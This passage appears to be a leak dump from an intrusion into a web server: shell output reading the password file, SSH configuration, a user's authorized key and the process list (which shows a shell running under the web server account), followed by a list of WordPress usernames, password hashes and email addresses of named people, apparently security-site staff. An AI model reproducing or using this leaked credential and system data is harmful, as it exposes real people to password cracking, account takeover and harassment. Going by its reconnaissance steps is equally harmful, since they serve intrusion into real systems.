  545. syslog:x:101:103::/home/syslog:/bin/false
  546. sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
  547. landscape:x:103:108::/var/lib/landscape:/bin/false
  548. mysql:x:104:112:MySQL Server,,,:/var/lib/mysql:/bin/false
  549. smmta:x:105:114:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
  550. smmsp:x:106:115:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
  551. emgent:x:1003:1002:,,,:/home/emgent:/bin/bash
  552. ossec:x:1004:1003::/var/ossec:/bin/false
  553. ossecm:x:1005:1003::/var/ossec:/bin/false
  554. ossecr:x:1006:1003::/var/ossec:/bin/false
  555.  
  556. $ cat /etc/issue
  557. Ubuntu 10.04.1 LTS \n \l
  558.  
  559.  
  560. $ cat /etc/ssh/sshd_config
  561. # Package generated configuration file
  562. # See the sshd_config(5) manpage for details
  563.  
  564. # What ports, IPs and protocols we listen for
  565. Port 22
  566. # Use these options to restrict which interfaces/protocols sshd will bind to
  567. #ListenAddress ::
  568. #ListenAddress 0.0.0.0
  569. Protocol 2
  570. # HostKeys for protocol version 2
  571. HostKey /etc/ssh/ssh_host_rsa_key
  572. HostKey /etc/ssh/ssh_host_dsa_key
  573. #Privilege Separation is turned on for security
  574. UsePrivilegeSeparation yes
  575.  
  576. # Lifetime and size of ephemeral version 1 server key
  577. KeyRegenerationInterval 3600
  578. ServerKeyBits 768
  579.  
  580. # Logging
  581. SyslogFacility AUTH
  582. LogLevel INFO
  583.  
  584. # Authentication:
  585. LoginGraceTime 120
  586. PermitRootLogin yes
  587. StrictModes yes
  588.  
  589. RSAAuthentication yes
  590. PubkeyAuthentication yes
  591. #AuthorizedKeysFile %h/.ssh/authorized_keys
  592.  
  593. # Don't read the user's ~/.rhosts and ~/.shosts files
  594. IgnoreRhosts yes
  595. # For this to work you will also need host keys in /etc/ssh_known_hosts
  596. RhostsRSAAuthentication no
  597. # similar for protocol version 2
  598. HostbasedAuthentication no
  599. # Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
  600. #IgnoreUserKnownHosts yes
  601.  
  602. # To enable empty passwords, change to yes (NOT RECOMMENDED)
  603. PermitEmptyPasswords no
  604.  
  605. # Change to yes to enable challenge-response passwords (beware issues with
  606. # some PAM modules and threads)
  607. ChallengeResponseAuthentication no
  608.  
  609. # Change to no to disable tunnelled clear text passwords
  610. PasswordAuthentication yes
  611.  
  612. # Kerberos options
  613. #KerberosAuthentication no
  614. #KerberosGetAFSToken no
  615. #KerberosOrLocalPasswd yes
  616. #KerberosTicketCleanup yes
  617.  
  618. # GSSAPI options
  619. #GSSAPIAuthentication no
  620. #GSSAPICleanupCredentials yes
  621.  
  622. X11Forwarding yes
  623. X11DisplayOffset 10
  624. PrintMotd no
  625. PrintLastLog yes
  626. TCPKeepAlive yes
  627. #UseLogin no
  628.  
  629. #MaxStartups 10:30:60
  630. #Banner /etc/issue.net
  631.  
  632. # Allow client to pass locale environment variables
  633. AcceptEnv LANG LC_*
  634.  
  635. Subsystem sftp /usr/lib/openssh/sftp-server
  636.  
  637. # Set this to 'yes' to enable PAM authentication, account processing,
  638. # and session processing. If this is enabled, PAM authentication will
  639. # be allowed through the ChallengeResponseAuthentication and
  640. # PasswordAuthentication. Depending on your PAM configuration,
  641. # PAM authentication via ChallengeResponseAuthentication may bypass
  642. # the setting of "PermitRootLogin without-password".
  643. # If you just want the PAM account and session checks to run without
  644. # PAM authentication, then enable this but set PasswordAuthentication
  645. # and ChallengeResponseAuthentication to 'no'.
  646. UsePAM yes
  647.  
  648. $ cd /home
  649.  
  650. $ ls -la
  651. total 12
  652. drwxr-xr-x 3 root root 4096 Aug 3 11:48 .
  653. drwxr-xr-x 26 root root 4096 Nov 30 06:53 ..
  654. drwxr-xr-x 7 emgent emgent 4096 Aug 7 07:45 emgent
  655.  
  656. $ cd emgent
  657.  
  658. $ ls -la
  659. total 48
  660. drwxr-xr-x 7 emgent emgent 4096 Aug 7 07:45 .
  661. drwxr-xr-x 3 root root 4096 Aug 3 11:48 ..
  662. -rw------- 1 emgent emgent 259 Oct 18 11:39 .bash_history
  663. -rw-r--r-- 1 emgent emgent 220 Aug 3 11:48 .bash_logout
  664. -rw-r--r-- 1 emgent emgent 3103 Aug 3 11:48 .bashrc
  665. drwx------ 2 emgent emgent 4096 Aug 3 11:49 .cache
  666. drwx------ 2 emgent emgent 4096 Aug 3 11:49 .irssi
  667. -rw------- 1 emgent emgent 9 Aug 3 11:50 .nano_history
  668. -rw-r--r-- 1 emgent emgent 675 Aug 3 11:48 .profile
  669. drwxr-xr-x 2 emgent emgent 4096 Aug 3 11:49 .ssh
  670. drwxr-xr-x 3 emgent emgent 4096 Aug 7 07:45 .subversion
  671. drwxr-xr-x 4 emgent emgent 4096 Aug 7 07:46 exploitdb
  672.  
  673.  
  674.  
  675. $ cd .ssh
  676.  
  677. $ ls
  678. authorized_keys
  679. cat authorized_keys
  680. ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAntXlep19oECqVocmK6UIhsxI5yGQSPUVYWOZXWO7Q0wP9vF5FfHmE4yCmKt+MleWcPWkkbI6IXBt9TNtw7m6usPx2IEbpEVr8sl7pT8hiW8tKNew74gEEgE53AGLhWr/+vViL+5K4SKCt591oABDtWA6KIEOuyx9/jqLLwBTQP0UyrqIJpR9VhQ2GQ6tN6Y+LV4tvpqy8ehevsIqdj+HvdsvVU2sREJsSH5xAncaRJQ1sfQepyeAwi7yZ1fBT4U4/LlukkBLIqjXk2D6jPZG870R4KCEI280rBJ9DX4fPX9qvYUwOm/OtWwxC7kivuCnNM1v2wBRUVCBmSUimqWnpQ== emgent@enJoy
  681.  
  682. $ ps aux
  683. USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
  684. root 1 0.0 0.0 23680 1244 ? Ss Nov11 0:07 /sbin/init
  685. root 2 0.0 0.0 0 0 ? S Nov11 0:00 [kthreadd]
  686. root 3 0.0 0.0 0 0 ? S Nov11 0:01 [migration/0]
  687. root 4 0.0 0.0 0 0 ? S Nov11 0:12 [ksoftirqd/0]
  688. root 5 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/0]
  689. root 6 0.0 0.0 0 0 ? S Nov11 0:02 [migration/1]
  690. root 7 0.0 0.0 0 0 ? S Nov11 0:04 [ksoftirqd/1]
  691. root 8 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/1]
  692. root 9 0.0 0.0 0 0 ? S Nov11 0:02 [migration/2]
  693. root 10 0.0 0.0 0 0 ? S Nov11 0:02 [ksoftirqd/2]
  694. root 11 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/2]
  695. root 12 0.0 0.0 0 0 ? S Nov11 0:01 [migration/3]
  696. root 13 0.0 0.0 0 0 ? S Nov11 0:05 [ksoftirqd/3]
  697. root 14 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/3]
  698. root 15 0.0 0.0 0 0 ? S Nov11 0:32 [events/0]
  699. root 16 0.0 0.0 0 0 ? S Nov11 13:44 [events/1]
  700. root 17 0.0 0.0 0 0 ? S Nov11 0:17 [events/2]
  701. root 18 0.0 0.0 0 0 ? S Nov11 0:18 [events/3]
  702. root 19 0.0 0.0 0 0 ? S Nov11 0:00 [cpuset]
  703. root 20 0.0 0.0 0 0 ? S Nov11 0:00 [khelper]
  704. root 21 0.0 0.0 0 0 ? S Nov11 0:00 [netns]
  705. root 22 0.0 0.0 0 0 ? S Nov11 0:00 [async/mgr]
  706. root 23 0.0 0.0 0 0 ? S Nov11 0:00 [pm]
  707. root 25 0.0 0.0 0 0 ? S Nov11 0:02 [sync_supers]
  708. root 26 0.0 0.0 0 0 ? S Nov11 0:04 [bdi-default]
  709. root 27 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/0]
  710. root 28 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/1]
  711. root 29 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/2]
  712. root 30 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/3]
  713. root 31 0.0 0.0 0 0 ? S Nov11 11:09 [kblockd/0]
  714. root 32 0.0 0.0 0 0 ? S Nov11 2:17 [kblockd/1]
  715. root 33 0.0 0.0 0 0 ? S Nov11 1:33 [kblockd/2]
  716. root 34 0.0 0.0 0 0 ? S Nov11 1:14 [kblockd/3]
  717. root 35 0.0 0.0 0 0 ? S Nov11 0:00 [kacpid]
  718. root 36 0.0 0.0 0 0 ? S Nov11 0:00 [kacpi_notify]
  719. root 37 0.0 0.0 0 0 ? S Nov11 0:00 [kacpi_hotplug]
  720. root 38 0.0 0.0 0 0 ? S Nov11 0:00 [ata/0]
  721. root 39 0.0 0.0 0 0 ? S Nov11 0:00 [ata/1]
  722. root 40 0.0 0.0 0 0 ? S Nov11 0:00 [ata/2]
  723. root 41 0.0 0.0 0 0 ? S Nov11 0:00 [ata/3]
  724. root 42 0.0 0.0 0 0 ? S Nov11 0:00 [ata_aux]
  725. root 43 0.0 0.0 0 0 ? S Nov11 0:00 [ksuspend_usbd]
  726. root 44 0.0 0.0 0 0 ? S Nov11 0:00 [khubd]
  727. root 45 0.0 0.0 0 0 ? S Nov11 0:00 [kseriod]
  728. root 46 0.0 0.0 0 0 ? S Nov11 0:00 [kmmcd]
  729. root 51 0.0 0.0 0 0 ? S Nov11 0:00 [khungtaskd]
  730. root 52 0.0 0.0 0 0 ? S Nov11 0:30 [kswapd0]
  731. root 53 0.0 0.0 0 0 ? SN Nov11 0:00 [ksmd]
  732. root 54 0.0 0.0 0 0 ? S Nov11 0:00 [aio/0]
  733. root 55 0.0 0.0 0 0 ? S Nov11 0:00 [aio/1]
  734. root 56 0.0 0.0 0 0 ? S Nov11 0:00 [aio/2]
  735. root 57 0.0 0.0 0 0 ? S Nov11 0:00 [aio/3]
  736. root 58 0.0 0.0 0 0 ? S Nov11 0:00 [ecryptfs-kthrea]
  737. root 59 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/0]
  738. root 60 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/1]
  739. root 61 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/2]
  740. root 62 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/3]
  741. root 65 0.0 0.0 0 0 ? S Nov11 0:00 [pciehpd]
  742. root 66 0.0 0.0 0 0 ? S Nov11 0:00 [scsi_eh_0]
  743. root 67 0.0 0.0 0 0 ? S Nov11 0:00 [scsi_eh_1]
  744. root 69 0.0 0.0 0 0 ? S Nov11 0:00 [kstriped]
  745. root 70 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/0]
  746. root 71 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/1]
  747. root 72 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/2]
  748. root 73 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/3]
  749. root 74 0.0 0.0 0 0 ? S Nov11 0:00 [kmpath_handlerd]
  750. root 75 0.0 0.0 0 0 ? S Nov11 0:00 [ksnapd]
  751. root 76 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/0]
  752. root 77 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/1]
  753. root 78 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/2]
  754. root 79 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/3]
  755. root 80 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/0]
  756. root 81 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/1]
  757. root 82 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/2]
  758. root 83 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/3]
  759. root 191 0.0 0.0 0 0 ? S Nov11 1:03 [mpt_poll_0]
  760. root 192 0.0 0.0 0 0 ? S Nov11 0:00 [mpt/0]
  761. root 268 0.0 0.0 0 0 ? S Nov11 0:00 [scsi_eh_2]
  762. root 285 0.3 0.0 0 0 ? S Nov11 125:09 [jbd2/sda1-8]
  763. root 286 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit]
  764. root 287 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit]
  765. root 288 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit]
  766. root 289 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit]
  767. root 322 0.3 0.0 0 0 ? S Nov11 115:40 [flush-8:0]
  768. root 347 0.0 0.0 16904 640 ? S Nov11 0:00 upstart-udev-bridge --daemon
  769. root 363 0.0 0.0 16920 416 ? S<s Nov11 0:00 udevd --daemon
  770. root 582 0.0 0.0 0 0 ? S Nov11 0:00 [kpsmoused]
  771. syslog 714 0.0 0.0 191492 1148 ? Sl Nov11 3:22 rsyslogd -c4
  772. root 732 0.0 0.0 49260 528 ? Ss Nov11 0:01 /usr/sbin/sshd
  773. root 773 0.0 0.0 6080 284 tty4 Ss+ Nov11 0:00 /sbin/getty -8 38400 tty4
  774. root 777 0.0 0.0 6080 284 tty5 Ss+ Nov11 0:00 /sbin/getty -8 38400 tty5
  775. root 787 0.0 0.0 6080 284 tty2 Ss+ Nov11 0:00 /sbin/getty -8 38400 tty2
  776. root 788 0.0 0.0 6080 284 tty3 Ss+ Nov11 0:00 /sbin/getty -8 38400 tty3
  777. root 792 0.0 0.0 6080 284 tty6 Ss+ Nov11 0:00 /sbin/getty -8 38400 tty6
  778. root 806 0.0 0.0 21076 428 ? Ss Nov11 0:07 cron
  779. daemon 807 0.0 0.0 18884 348 ? Ss Nov11 0:00 atd
  780. root 817 0.0 0.0 11284 428 ? Ss Nov11 1:53 /usr/sbin/irqbalance
  781. root 950 0.0 0.0 84384 848 ? Ss Nov11 1:24 sendmail: MTA: accepting connections
  782. root 1318 0.0 0.0 53108 4076 ? Sl Nov11 7:28 /usr/bin/python /usr/bin/fail2ban-server -b -s /var/run/fail2ban/fail2ban.sock
  783. root 1354 0.0 0.0 97040 408 ? Ss Nov11 0:07 /usr/bin/svnserve -d -r /var/svn/
  784. root 1357 0.0 0.0 6080 284 tty1 Ss+ Nov11 0:00 /sbin/getty -8 38400 tty1
  785. root 3467 0.0 0.0 0 0 ? S Nov30 0:00 [xfs_mru_cache]
  786. root 3468 0.0 0.0 0 0 ? S Nov30 0:00 [xfslogd/0]
  787. root 3469 0.0 0.0 0 0 ? S Nov30 0:00 [xfslogd/1]
  788. root 3470 0.0 0.0 0 0 ? S Nov30 0:00 [xfslogd/2]
  789. root 3471 0.0 0.0 0 0 ? S Nov30 0:00 [xfslogd/3]
  790. root 3472 0.0 0.0 0 0 ? S Nov30 0:00 [xfsdatad/0]
  791. root 3473 0.0 0.0 0 0 ? S Nov30 0:00 [xfsdatad/1]
  792. root 3474 0.0 0.0 0 0 ? S Nov30 0:00 [xfsdatad/2]
  793. root 3475 0.0 0.0 0 0 ? S Nov30 0:00 [xfsdatad/3]
  794. root 3476 0.0 0.0 0 0 ? S Nov30 0:00 [xfsconvertd/0]
  795. root 3477 0.0 0.0 0 0 ? S Nov30 0:00 [xfsconvertd/1]
  796. root 3478 0.0 0.0 0 0 ? S Nov30 0:00 [xfsconvertd/2]
  797. root 3479 0.0 0.0 0 0 ? S Nov30 0:00 [xfsconvertd/3]
  798. root 3489 0.0 0.0 16980 372 ? S< Nov30 0:00 udevd --daemon
  799. root 3490 0.0 0.0 16980 376 ? S< Nov30 0:00 udevd --daemon
  800. root 3491 0.0 0.0 0 0 ? S Nov30 0:00 [jfsIO]
  801. root 3492 0.0 0.0 0 0 ? S Nov30 0:00 [jfsCommit]
  802. root 3493 0.0 0.0 0 0 ? S Nov30 0:00 [jfsCommit]
  803. root 3494 0.0 0.0 0 0 ? S Nov30 0:00 [jfsCommit]
  804. root 3495 0.0 0.0 0 0 ? S Nov30 0:00 [jfsCommit]
  805. root 3496 0.0 0.0 0 0 ? S Nov30 0:00 [jfsSync]
  806. root 4114 0.0 0.0 107552 1928 ? S Nov23 0:00 /usr/bin/svnserve -d -r /var/svn/
  807. root 7702 0.0 0.0 107420 1960 ? S 13:31 0:00 /usr/bin/svnserve -d -r /var/svn/
  808. root 8080 0.1 0.1 346236 11548 ? Ss Nov26 18:14 /usr/sbin/apache2 -k start
  809. root 9853 0.0 0.0 9756 384 ? Ss Nov11 1:04 tail -f /var/log/apache2/jesys.log
  810. www-data 10874 0.0 0.6 354384 38764 ? S 14:15 0:00 /usr/sbin/apache2 -k start
  811. www-data 10909 0.0 0.0 25632 2876 ? S 14:15 0:00 dhcpcd
  812. www-data 10910 0.0 0.0 4096 656 ? S 14:15 0:00 /bin/sh
  813. www-data 13491 0.1 0.6 356496 39580 ? S 14:54 0:01 /usr/sbin/apache2 -k start
  814. root 13493 0.1 0.1 116628 11268 ? S 14:54 0:00 /usr/bin/svnserve -d -r /var/svn/
  815. www-data 13510 0.0 0.0 4040 524 ? S 14:55 0:00 cat www.tar.gz
  816. root 13561 0.0 0.0 107420 1940 ? S Nov30 0:00 /usr/bin/svnserve -d -r /var/svn/
  817. www-data 13681 0.1 0.5 354240 32356 ? S 14:57 0:00 /usr/sbin/apache2 -k start
  818. www-data 13884 0.1 0.5 354792 33064 ? S 14:59 0:00 /usr/sbin/apache2 -k start
  819. www-data 13889 0.2 0.5 353632 31568 ? S 14:59 0:01 /usr/sbin/apache2 -k start
  820. www-data 13960 0.0 0.6 354384 38812 ? S 15:01 0:00 /usr/sbin/apache2 -k start
  821. www-data 13976 0.2 0.5 355192 32200 ? S 15:01 0:00 /usr/sbin/apache2 -k start
  822. www-data 14022 0.0 0.0 25632 2876 ? S 15:02 0:00 dhcpcd
  823. www-data 14023 0.0 0.0 4096 628 ? S 15:02 0:00 /bin/sh
  824. www-data 14026 0.2 0.5 353888 33228 ? S 15:02 0:00 /usr/sbin/apache2 -k start
  825. www-data 14027 0.1 0.5 356512 32860 ? S 15:02 0:00 /usr/sbin/apache2 -k start
  826. www-data 14062 0.2 0.5 353548 32144 ? S 15:03 0:00 /usr/sbin/apache2 -k start
  827. www-data 14063 0.1 0.5 353644 30840 ? S 15:03 0:00 /usr/sbin/apache2 -k start
  828. www-data 14152 0.2 0.5 353376 31236 ? S 15:04 0:00 /usr/sbin/apache2 -k start
  829. www-data 14154 0.3 0.5 352856 31284 ? S 15:04 0:00 /usr/sbin/apache2 -k start
  830. www-data 14159 0.1 0.5 353888 30852 ? S 15:04 0:00 /usr/sbin/apache2 -k start
  831. www-data 14160 0.2 0.5 355332 31280 ? S 15:04 0:00 /usr/sbin/apache2 -k start
  832. www-data 14163 0.1 0.5 354204 31520 ? S 15:04 0:00 /usr/sbin/apache2 -k start
  833. www-data 14183 0.1 0.4 353804 30404 ? S 15:05 0:00 /usr/sbin/apache2 -k start
  834. www-data 14185 0.2 0.4 352724 30460 ? S 15:05 0:00 /usr/sbin/apache2 -k start
  835. www-data 14188 0.2 0.5 353544 32600 ? S 15:05 0:00 /usr/sbin/apache2 -k start
  836. www-data 14194 0.1 0.4 353880 30564 ? S 15:05 0:00 /usr/sbin/apache2 -k start
  837. www-data 14201 0.1 0.5 353500 31264 ? S 15:05 0:00 /usr/sbin/apache2 -k start
  838. www-data 14204 0.2 0.5 354516 32044 ? S 15:05 0:00 /usr/sbin/apache2 -k start
  839. www-data 14205 0.1 0.4 353360 29148 ? S 15:05 0:00 /usr/sbin/apache2 -k start
  840. ossecm 14276 0.0 0.0 16844 644 ? S Dec02 0:01 /var/ossec/bin/ossec-maild
  841. root 14286 0.0 0.0 12496 576 ? S Dec02 0:03 /var/ossec/bin/ossec-execd
  842. ossec 14291 0.0 0.0 14924 3052 ? S Dec02 0:43 /var/ossec/bin/ossec-analysisd
  843. root 14295 0.0 0.0 4236 584 ? S Dec02 0:22 /var/ossec/bin/ossec-logcollector
  844. www-data 14315 0.0 0.4 352972 29480 ? S 15:05 0:00 /usr/sbin/apache2 -k start
  845. www-data 14316 0.2 0.5 353360 31168 ? S 15:05 0:00 /usr/sbin/apache2 -k start
  846. www-data 14317 0.1 0.5 354404 30832 ? S 15:05 0:00 /usr/sbin/apache2 -k start
  847. www-data 14345 0.2 0.4 352592 30052 ? S 15:07 0:00 /usr/sbin/apache2 -k start
  848. www-data 14346 0.1 0.4 354008 30416 ? S 15:07 0:00 /usr/sbin/apache2 -k start
  849. www-data 14348 0.1 0.4 352356 29156 ? S 15:07 0:00 /usr/sbin/apache2 -k start
  850. www-data 14350 0.0 0.1 347492 10892 ? S 15:07 0:00 /usr/sbin/apache2 -k start
  851. www-data 14351 0.1 0.4 353272 30452 ? S 15:07 0:00 /usr/sbin/apache2 -k start
  852. www-data 14352 0.3 0.5 354176 31516 ? S 15:07 0:00 /usr/sbin/apache2 -k start
  853. www-data 14355 0.3 0.4 352328 29492 ? S 15:07 0:00 /usr/sbin/apache2 -k start
  854. www-data 14356 0.2 0.5 354200 31508 ? S 15:07 0:00 /usr/sbin/apache2 -k start
  855. www-data 14357 0.0 0.4 352584 28180 ? S 15:07 0:00 /usr/sbin/apache2 -k start
  856. root 14361 0.0 0.0 4996 1664 ? S Dec02 0:34 /var/ossec/bin/ossec-syscheckd
  857. ossec 14365 0.0 0.0 12764 844 ? S Dec02 0:00 /var/ossec/bin/ossec-monitord
  858. www-data 14366 0.2 0.4 352348 29836 ? S 15:07 0:00 /usr/sbin/apache2 -k start
  859. www-data 14367 0.1 0.4 353492 30468 ? S 15:07 0:00 /usr/sbin/apache2 -k start
  860. www-data 14369 0.1 0.4 353424 30616 ? S 15:07 0:00 /usr/sbin/apache2 -k start
  861. www-data 14370 0.1 0.5 356216 31440 ? S 15:07 0:00 /usr/sbin/apache2 -k start
  862. www-data 14371 0.2 0.5 353996 31636 ? S 15:07 0:00 /usr/sbin/apache2 -k start
  863. www-data 14372 0.1 0.4 352356 28228 ? S 15:07 0:00 /usr/sbin/apache2 -k start
  864. www-data 14377 0.0 0.1 347236 10808 ? S 15:07 0:00 /usr/sbin/apache2 -k start
  865. www-data 14378 0.2 0.4 352612 29308 ? S 15:07 0:00 /usr/sbin/apache2 -k start
  866. root 14386 0.0 0.0 0 0 ? Z 15:07 0:00 [host-deny.sh] <defunct>
  867. root 14387 0.0 0.0 0 0 ? Z 15:07 0:00 [firewall-drop.s] <defunct>
  868. www-data 14407 0.4 0.5 354384 32672 ? S 15:07 0:00 /usr/sbin/apache2 -k start
  869. www-data 14408 0.1 0.4 352604 29276 ? S 15:07 0:00 /usr/sbin/apache2 -k start
  870. www-data 14412 0.3 0.5 354716 32420 ? S 15:08 0:00 /usr/sbin/apache2 -k start
  871. www-data 14413 0.4 0.4 352592 29272 ? S 15:08 0:00 /usr/sbin/apache2 -k start
  872. www-data 14414 0.2 0.4 352600 28200 ? S 15:08 0:00 /usr/sbin/apache2 -k start
  873. www-data 14415 0.3 0.4 352724 29088 ? S 15:08 0:00 /usr/sbin/apache2 -k start
  874. www-data 14416 0.2 0.4 353776 29452 ? S 15:08 0:00 /usr/sbin/apache2 -k start
  875. www-data 14417 0.2 0.4 353136 28616 ? S 15:08 0:00 /usr/sbin/apache2 -k start
  876. www-data 14418 0.3 0.4 353520 29500 ? S 15:08 0:00 /usr/sbin/apache2 -k start
  877. www-data 14419 0.7 0.0 0 0 ? Z 15:08 0:00 [apache2] <defunct>
  878. www-data 14420 0.5 0.5 353976 31084 ? S 15:08 0:00 /usr/sbin/apache2 -k start
  879. www-data 14421 0.3 0.4 353252 29180 ? S 15:08 0:00 /usr/sbin/apache2 -k start
  880. www-data 14422 0.0 0.1 346724 8076 ? S 15:08 0:00 /usr/sbin/apache2 -k start
  881. www-data 14423 0.6 0.5 354352 31720 ? S 15:08 0:00 /usr/sbin/apache2 -k start
  882. www-data 14424 0.4 0.4 353808 29848 ? S 15:08 0:00 /usr/sbin/apache2 -k start
  883. www-data 14425 0.3 0.4 352584 28252 ? S 15:08 0:00 /usr/sbin/apache2 -k start
  884. www-data 14426 0.1 0.1 346748 10564 ? S 15:08 0:00 /usr/sbin/apache2 -k start
  885. www-data 14427 0.6 0.4 352976 28944 ? S 15:08 0:00 /usr/sbin/apache2 -k start
  886. www-data 14428 0.0 0.1 346724 8204 ? S 15:08 0:00 /usr/sbin/apache2 -k start
  887. www-data 14429 0.0 0.1 346724 8196 ? S 15:08 0:00 /usr/sbin/apache2 -k start
  888. www-data 14430 0.7 0.4 352976 29032 ? S 15:08 0:00 /usr/sbin/apache2 -k start
  889. www-data 14431 0.9 0.4 353668 30120 ? S 15:08 0:00 /usr/sbin/apache2 -k start
  890. www-data 14432 0.9 0.4 353368 29668 ? S 15:08 0:00 /usr/sbin/apache2 -k start
  891. www-data 14433 0.8 0.4 352976 28836 ? S 15:08 0:00 /usr/sbin/apache2 -k start
  892. www-data 14435 1.3 0.4 352716 29364 ? S 15:08 0:00 /usr/sbin/apache2 -k start
  893. www-data 14436 1.8 0.4 353736 30320 ? S 15:08 0:00 /usr/sbin/apache2 -k start
  894. www-data 14437 0.1 0.1 346236 7760 ? S 15:08 0:00 /usr/sbin/apache2 -k start
  895. www-data 14438 0.0 0.0 14976 1116 ? R 15:08 0:00 ps aux
  896. root 19786 0.0 0.0 107420 1884 ? S Nov16 0:00 /usr/bin/svnserve -d -r /var/svn/
  897. root 19983 0.0 0.0 107420 1940 ? S Nov29 0:00 /usr/bin/svnserve -d -r /var/svn/
  898. root 19989 0.0 0.0 107420 1884 ? S Nov16 0:00 /usr/bin/svnserve -d -r /var/svn/
  899. root 20015 0.0 0.0 107420 1884 ? S Nov16 0:00 /usr/bin/svnserve -d -r /var/svn/
  900. root 20286 0.0 0.0 107420 1888 ? S Nov18 0:00 /usr/bin/svnserve -d -r /var/svn/
  901. mysql 22394 10.4 24.9 2441860 1529604 ? Ssl Nov12 3357:17 /usr/sbin/mysqld
  902.  
  903. $ df -h
  904. Filesystem Size Used Avail Use% Mounted on
  905. /dev/sda1 48G 17G 29G 37% /
  906. none 3.0G 172K 3.0G 1% /dev
  907. none 3.0G 0 3.0G 0% /dev/shm
  908. none 3.0G 56K 3.0G 1% /var/run
  909. none 3.0G 0 3.0G 0% /var/lock
  910. none 3.0G 0 3.0G 0% /lib/init/rw
  911. none 48G 17G 29G 37% /var/lib/ureadahead/debugfs
  912.  
  913. Wordpress:
  914. admin:$P$B./Y8qG9A2YuqIz4uBAjFRo.9Yv0Fb1::muts@offsec.com
  915. dookie2000ca:$P$B7YVdu0JG/JOf2YAS8WsmQqHnZHf.b/:dookie2000ca:dookie@exploit-db.com
  916. innrwrld:$P$BaJi4YkAt5o/paWUfDMdOOWuqHx/is/:innrwrld:innrwrld@exploit-db.com
  917. ivan:$P$B/YVWEkaYIq3s2QLSmVB/wvXWYqoM80::centaur.mail@gmail.com
  918. sinn3r:$P$BYzu/ozErhWi8hB8IPFdr6Tv2R9rat/:3r:sinn3r@exploit-db.com
  919. loneferret:$P$Bgsl0.nlu4De51qkI8MDoeHDS6iLcM1:loneferret:loneferret@exploit-db.com
  920. ronin:$P$BFw9OFuWa1s/t5DUJwKO6A0Otfkewo0::ronin@exploit-db.com
  921. dijital1:$P$BirOcybWYDo/Z/wrJ5zBq2zaGElV.f/:dijital1:rlh@ciphermonk.net
  922. emgent:$P$BYiha9WKXDzXQm8A8RXboRc7zZuus0.::emgent@backtrack-linux.org
  923. j0fer:$P$Bgtsc7w.Vb6mCkJfJi7JkSO5zJUEBY.::j0fer@exploit-db.com
  924. ReL1K:$P$B6DyRPNYrBuC.WRv5GrDnFg3wAQPo91::kennedyd013@gmail.com
  925. Xpl0it:$P$BGBdVhFBaUM8s9ooGcmB01t.zoK.0V0::mr.xpl0it@gmail.com
  926. fdiskyou:$P$BlgwWd3EmVg4SsfIxzOjqUQfGKfLZD0:fdiskyou:rui@exploit-db.com
  927. rawjaw:$P$Bovffv59pNKpCOOvKlbGqFOmAh.HKb0::rawjaw@exploit-db.com
  928. djokica:$P$BNeyg6NPYJWO9fzjfZs1okvMiM0vq51::centaur@pavko.info
  929. xxDigiPxx:$P$B2eEGgTNsZnM4DFpIr4kNrKXv.ivyg/:xxdigipxx:xxtwistedpairxx@comcast.net
  930. muts:$P$Bn.MAuG.OlZ1NtTxq0WWAUwhVEfusC.::muts@offensive-security.com
  931. Ryujin:$P$BZ75UnhRqkJZj82bWfXbeD6dVxzXTG0::ryujin@offsec.com
  932. didn0t:$P$BkGM.gSmmmuDlkJUKjCzy1LfUn9AnS.::paul@pizza.org
  933. zelik:$P$BYjCAaqW0tcdNV3MZviRZoN./.HMKn0::tal.zeltzer@gmail.com
  934. bitform:$P$BLk7y3.7JTn12lRYj25A/JXJ1W0SIA1::mattgraeber@gmail.com
  935. bolexxx:$P$B1liji1bDZoOOwnVwV3Aa59Mqux0FC1::bolexxx@offsec.com
  936. h00die:$P$Behl/g/GHQo5zxciUMgjPPzu7ZI8nO/::ragecyr@exploit-db.com
  937. MaXe:$P$B6PKmgTlcm5L5kpysXfksmEmRfMy6U.::MaXe@intern0t.net
  938. marked_doe:$P$By1rR96ByDsyil/yQa79qBE/A7nbOA1:marked_doe:marc@doudiet.net
  939. code0wnz:$P$Bw1OuJHHzMtUBd8oSjmFoQYKtzjaC..:code0wnz:code0wnz@gmail.com
  940. Dr_IDE:$P$BR.ReeHZDabreI8G0D5NARv8oY6SOP/::dr_ide@hushmail.com
  941. Sud0:$P$BqovGmeqOSCzsHFso9q4goSZ4hkWbK1: :Sud0.x90@gmail.com
  942. TecR0c:$P$BXoaJm6vL1VKJWz.K3m1M.XXVoXU9K/::tecr0c@corelan.be
  943. kripthor:$P$BpUEGtZ3PvzfYotKDvvRA1AU9U4.iq1:kripthor:umbelino@crazydog.pt
